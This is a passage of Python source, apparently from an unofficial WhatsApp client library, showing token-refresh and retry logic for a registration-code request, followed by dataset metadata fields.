                            or parsed["r"] != self.currentToken["r"]
                            or parsed["u"] != self.currentToken["u"]
                            or parsed["t"] != self.currentToken["t"]
                            or parsed["d"] != self.currentToken["d"]
                        ):
                            self.currentToken = parsed
                            print("Fetched a new token, persisting !")
                            self.removeParam("token")
                            print("Now retrying the request..")
                            self.addParam(
                                "token", self.getToken(self.p_in, self.currentToken["t"]))
                        else:
                            print("No new tokens :(")
                        # Re-send the original code request with the
                        # (possibly refreshed) token parameter.
                        res = super(WACodeRequest, self).send(parser)
                        if res and res["status"] != "fail":
                            Utilities.persistToken(tokenData)  # good token
        return res
|
UTF-8
|
Python
| false | false | 2,014 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.